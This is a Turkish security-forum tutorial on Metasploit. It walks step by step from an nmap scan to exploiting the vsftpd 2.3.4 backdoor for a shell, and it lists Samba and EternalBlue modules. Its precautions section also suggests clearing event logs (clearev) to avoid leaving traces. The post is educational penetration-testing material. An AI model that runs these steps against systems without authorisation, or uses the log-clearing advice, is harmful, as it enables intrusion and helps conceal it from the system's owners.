Hoşgeldin Misafir

Metasploit ile Servis Zafiyet Testi

Sarraf

Sarraf

THS-SARRAF
Belarus
12 Ara 2020
2,111 Mesaj
TIM Görevleri
1

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhabalar!
Ben @Sarraf, Lojistik grup adına paylaşılan Metasploit ile Servis Zafiyet Testi makalesinde sizi görmekten mutluyum.

Eğer hazırsanız, başlayalım!


dn4qpjm.jpg

Metasploit ile Servis Zafiyet Testi


Siber güvenlik dünyasında en çok kullanılan araçlardan biri olan Metasploit Framework, zafiyet testleri ve sızma testlerinde kritik bir rol oynar. Bu yazıda, Metasploit kullanarak bir sistemdeki servisin zafiyetini nasıl tespit ederiz ve sömürme (exploit) süreci nasıl işler, adım adım ele alacağız.

1. Metasploit Nedir?


Metasploit Framework, açık kaynaklı bir sızma testi aracıdır. İçeriğinde yüzlerce exploit, payload, yardımcı araç ve zafiyet tarayıcısı barındırır. Özellikle Kali Linux gibi dağıtımlar ile birlikte önceden yüklenmiş olarak gelir.

2. Hedef Belirleme ve Bilgi Toplama


Öncelikle zafiyet testine başlamadan önce hedef sistemin IP adresi ve çalıştırdığı servisler hakkında bilgi toplamalıyız. Bu aşamada Nmap ile tarama yaparak açık portları ve servisleri belirleyebiliriz:

Kod:
bash
nmap -sV -Pn 192.168.1.10

Örnek çıktı:
Kod:
pgsql
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
80/tcp   open  http        Apache httpd 2.2.14

Bu çıktıda vsftpd 2.3.4 sürümünün bilinen bir arka kapı zafiyeti (CVE-2011-2523) olduğu anlaşılabilir.


3. Metasploit'i Başlatma


Metasploit konsolunu başlatmak için terminale şu komutu girin:
Kod:
bash
msfconsole

Ardından exploit araması yapalım:
Kod:
bash
search vsftpd 2.3.4

Sonuç:
Kod:
bash
exploit/unix/ftp/vsftpd_234_backdoor


4. Exploit Seçimi ve Yapılandırması


Exploit’i kullan:
Kod:
bash
use exploit/unix/ftp/vsftpd_234_backdoor

Hedef bilgilerini gir:
Kod:
bash
set RHOSTS 192.168.1.10
set RPORT 21

Payload’ı otomatik olarak seçtiği gibi bırakabilirsiniz, ancak manuel seçim de mümkündür:
Kod:
bash
show payloads
set PAYLOAD cmd/unix/interact


5. Exploit’i Çalıştırma

Her şey hazırsa aşağıdaki komutla saldırıyı başlatabilirsiniz:
Kod:
bash
run

Eğer zafiyet başarıyla sömürülürse, shell (kabuk) erişimi elde edersiniz:
Kod:
bash
[*] Command shell session 1 opened...

Artık hedef sistem üzerinde komutlar çalıştırabilirsiniz:
Kod:
bash
whoami
uname -a

6. Zafiyet Testinde Dikkat Edilmesi Gerekenler

  • Bu tür testler mutlaka izinli ortamlarda yapılmalıdır.
  • Hedef sisteme zarar verebilecek payloadlar dikkatle seçilmelidir.
  • Bazı exploit'ler sistemi çökertebilir, dikkatli olun.
  • Geriye log bırakmamak için anti-forensic modüller kullanılabilir (örn: clearev).

7. Diğer Örnek Exploit Senaryoları

a) Samba zafiyeti (CVE-2017-7494):

Kod:
bash
use exploit/linux/samba/is_known_pipename

b) MS17-010 EternalBlue (Windows):

Kod:
bash
use exploit/windows/smb/ms17_010_eternalblue

8. Kaynaklar ve Gelişmiş Kullanım

  • searchsploit komutu ile Exploit-DB veritabanından zafiyet aramaları yapabilirsiniz.
  • db_nmap komutu ile Metasploit içinde doğrudan Nmap taraması yapabilirsiniz.
  • post modülleri ile başarı sonrası sistem hakkında daha fazla bilgi toplayabilirsiniz.

Metasploit, yalnızca bir zafiyet sömürme aracı değil, aynı zamanda profesyonel bir sızma testi platformudur. Servis zafiyet testi yapmak, sadece açık portları bulmaktan öteye gider — hedef sistemde çalışan servislerin sürümleri, yapılandırmaları ve bilinen açıkları göz önünde bulundurularak titiz bir analiz gerektirir.

Yasal ve etik sınırlar içinde kaldığınız sürece, bu beceriler siber güvenlik alanında sizi bir adım öne çıkaracaktır.


Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!



LOJİSTİK TİM SUNDU
btn1pyf.png